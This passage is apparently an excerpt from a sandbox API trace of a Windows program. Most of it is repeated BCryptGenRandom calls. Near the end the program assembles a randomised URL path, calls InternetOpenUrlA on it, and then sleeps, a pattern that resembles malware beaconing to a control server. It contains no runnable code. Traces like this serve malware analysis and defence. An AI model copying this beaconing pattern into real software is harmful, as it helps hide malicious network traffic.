(hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.113] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.113] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.113] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.113] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.113] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.114] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.114] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.114] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.114] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.114] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.114] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.114] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.114] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.114] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.114] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.115] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.115] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.115] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.115] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.115] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.115] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.115] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.115] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.115] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.115] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.116] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.116] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.116] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.116] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.116] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.116] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.116] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.116] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.116] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.116] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.116] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.116] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.117] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.117] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.117] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.117] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.117] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.117] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.117] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.117] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.117] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.117] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.117] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.118] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.118] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.118] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.118] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.118] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0264.118] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.118] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d60d7, cbBuffer=0x24, dwFlags=0x2 | out: pbBuffer=0x4d60d7) returned 0x0 [0264.118] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.118] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.118] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.118] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.118] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.119] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.119] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.119] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.119] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.119] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.119] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.119] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.119] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.119] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.120] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.120] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.120] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.120] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.120] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.120] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.120] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.120] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.120] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.120] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.121] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.121] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.121] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.121] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.121] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.121] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.121] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.121] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.122] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.122] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.122] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.122] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.122] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.122] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.122] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.122] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.123] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.123] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.123] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.123] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.123] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.123] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.123] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.123] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.123] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.123] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.124] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.124] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0264.124] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.124] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d60fb, cbBuffer=0x15, dwFlags=0x2 | out: pbBuffer=0x4d60fb) returned 0x0 [0264.124] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.124] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.124] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.124] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.124] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.124] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.124] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.124] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.125] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.126] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.126] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.126] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.127] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.127] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.127] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.127] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.127] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.127] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.127] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.127] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.127] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.127] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.128] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.128] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.128] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.128] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.128] GetProcessHeap () returned 0x440000 [0264.128] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473140 [0264.128] lstrcpyA (in: lpString1=0x473140, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0264.128] lstrcatA (in: lpString1="\x81\x03", lpString2="/6n1p8gx8diceseLbxe00tk7lw/sudnlloFkbp9e4wcaWsulecHxyfbvEzm3yclqdR4tqQ/T0Xrhhmrjeacjmibxvr05lm8v62zI0exbpc/YxnK0j4enp0uyRrLGknz/" | out: lpString1="\x81\x03/6n1p8gx8diceseLbxe00tk7lw/sudnlloFkbp9e4wcaWsulecHxyfbvEzm3yclqdR4tqQ/T0Xrhhmrjeacjmibxvr05lm8v62zI0exbpc/YxnK0j4enp0uyRrLGknz/") returned="\x81\x03/6n1p8gx8diceseLbxe00tk7lw/sudnlloFkbp9e4wcaWsulecHxyfbvEzm3yclqdR4tqQ/T0Xrhhmrjeacjmibxvr05lm8v62zI0exbpc/YxnK0j4enp0uyRrLGknz/" [0264.128] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0264.128] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/6n1p8gx8diceseLbxe00tk7lw/sudnlloFkbp9e4wcaWsulecHxyfbvEzm3yclqdR4tqQ/T0Xrhhmrjeacjmibxvr05lm8v62zI0exbpc/YxnK0j4enp0uyRrLGknz/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0264.128] GetProcessHeap () returned 0x440000 [0264.128] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473140 | out: hHeap=0x440000) returned 1 [0264.128] GetProcessHeap () returned 0x440000 [0264.128] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4d6090 | out: hHeap=0x440000) returned 1 [0264.129] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0264.129] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0264.129] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.129] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0264.130] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0264.130] Sleep (dwMilliseconds=0x17b30) [0264.238] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.238] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0264.238] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.238] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0264.238] GetProcessHeap () returned 0x440000 [0264.238] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a17840 [0264.239] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.239] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0264.239] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.239] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17841, cbBuffer=0x28, dwFlags=0x2 | out: pbBuffer=0x3a17841) returned 0x0 [0264.239] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.239] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.239] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.239] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.239] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.239] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.240] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.240] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.240] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.240] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.240] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.240] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.240] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.240] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.240] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.240] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.241] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.241] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.241] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.241] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.241] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.241] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.241] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.241] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.241] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.241] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.242] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.242] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.242] BCryptGenRandom (in: hAlgorithm=0x0, 